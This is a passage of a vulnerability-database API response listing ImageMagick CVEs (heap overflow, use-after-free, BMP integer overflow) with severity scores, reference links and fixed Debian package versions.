"scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:51:18Z/" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/d3c0a37485314c5ccef72efb18f3847cd53868ba", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:51:18Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/d3c0a37485314c5ccef72efb18f3847cd53868ba" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-f4qm-vj5j-9xpw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:51:18Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-f4qm-vj5j-9xpw" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33902", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33902" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458040", "reference_id": "2458040", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458040" }, { "reference_url": "https://github.com/advisories/GHSA-f4qm-vj5j-9xpw", "reference_id": "GHSA-f4qm-vj5j-9xpw", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-f4qm-vj5j-9xpw" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" }, { "url": "http://public2.vulnerablecode.io/api/packages/1054646?format=api", "purl": "pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068084?format=api", "purl": "pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1" } ], "aliases": [ "CVE-2026-33902", "GHSA-f4qm-vj5j-9xpw" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-j6tc-f4fc-mbcv" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/24565?format=api", "vulnerability_id": "VCID-jc5m-7rvc-2qg6", "summary": "ImageMagick has a heap-buffer-overflow in NewXMLTree which could result in crash\nThe NewXMLTree method contains a bug that could result in a crash due to an out of write bounds of a single zero byte.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-32636.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-32636.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-32636", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04277", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04268", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04297", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04318", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.0426", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.0434", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04324", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04293", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04281", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04332", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05128", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05103", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-32636" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-32636", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-32636" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.11.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-19T14:54:31Z/" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.11.0" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-17", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-19T14:54:31Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-17" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-gc62-2v5p-qpmp", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-19T14:54:31Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-gc62-2v5p-qpmp" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32636", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32636" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448862", "reference_id": "2448862", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448862" }, { "reference_url": "https://github.com/advisories/GHSA-gc62-2v5p-qpmp", "reference_id": "GHSA-gc62-2v5p-qpmp", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-gc62-2v5p-qpmp" }, { "reference_url": "https://usn.ubuntu.com/8127-1/", "reference_id": "USN-8127-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8127-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026115?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" }, { "url": "http://public2.vulnerablecode.io/api/packages/1054646?format=api", "purl": "pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u7" } ], "aliases": [ "CVE-2026-32636", "GHSA-gc62-2v5p-qpmp" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jc5m-7rvc-2qg6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/21320?format=api", "vulnerability_id": "VCID-jcjk-s89c-mbbm", "summary": "ImageMagick: Invalid MSL <map> can result in a use after free\nThe MSL interpreter crashes when processing a invalid `<map>` element that causes it to use an image after it has been freed.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26983.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26983.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-26983", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03774", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03771", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03649", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03638", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03661", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03687", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.0371", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03752", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03729", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03726", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03701", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03712", "published_at": "2026-04-04T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-26983" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26983", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26983" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/7cfae4da24a995fb05386d77364ff404a7cca7bc", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/7cfae4da24a995fb05386d77364ff404a7cca7bc" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-w8mw-frc6-r7m8", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:09:37Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-w8mw-frc6-r7m8" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26983", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26983" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442134", "reference_id": "2442134", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442134" }, { "reference_url": "https://github.com/advisories/GHSA-w8mw-frc6-r7m8", "reference_id": "GHSA-w8mw-frc6-r7m8", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-w8mw-frc6-r7m8" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026115?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" } ], "aliases": [ "CVE-2026-26983", "GHSA-w8mw-frc6-r7m8" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jcjk-s89c-mbbm" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/21990?format=api", "vulnerability_id": "VCID-jtkv-nvan-jbag", "summary": "ImageMagick has Integer Overflow in BMP Decoder (ReadBMP)\nCVE-2025-57803 claims to be patched in ImageMagick 7.1.2-2, but **the fix is incomplete and ineffective**. The latest version **7.1.2-5 remains vulnerable** to the same integer overflow attack.\n\nThe patch added `BMPOverflowCheck()` but placed it **after** the overflow occurs, making it useless. A malicious 58-byte BMP file can trigger AddressSanitizer crashes and DoS.\n\n**Affected Versions:**\n- ImageMagick < 7.1.2-2 (originally reported)\n- **ImageMagick 7.1.2-2 through 7.1.2-5 (incomplete patch)**\n\n**Platform and Configuration Requirements:**\n- 32-bit systems ONLY (i386, i686, armv7l, etc.)\n- Requires `size_t = 4 bytes`. (64-bit systems are **NOT vulnerable** (size_t = 8 bytes))\n- Requires modified resource limits: The default `width`, `height`, and `area` limits must have been manually increased (Systems using default ImageMagick resource limits are **NOT vulnerable**).\n\n---", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-62171.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-62171.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-62171", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00074", "scoring_system": "epss", "scoring_elements": "0.22251", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00074", "scoring_system": "epss", "scoring_elements": "0.22552", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00074", "scoring_system": "epss", "scoring_elements": "0.22595", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00074", "scoring_system": "epss", "scoring_elements": "0.22383", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00074", "scoring_system": "epss", "scoring_elements": "0.22464", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00074", "scoring_system": "epss", "scoring_elements": "0.22519", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00074", "scoring_system": "epss", "scoring_elements": "0.22537", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00074", "scoring_system": "epss", "scoring_elements": "0.22496", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00074", "scoring_system": "epss", "scoring_elements": "0.22442", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00074", "scoring_system": "epss", "scoring_elements": "0.22458", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00074", "scoring_system": "epss", "scoring_elements": "0.22454", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00076", "scoring_system": "epss", "scoring_elements": "0.22694", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-62171" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-62171", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-62171" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.9.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.9.0" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/cea1693e2ded51b4cc91c70c54096cbed1691c00", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-17T17:05:36Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/cea1693e2ded51b4cc91c70c54096cbed1691c00" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00019.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00019.html" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1118340", "reference_id": "1118340", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1118340" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2404735", "reference_id": "2404735", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2404735" }, { "reference_url": 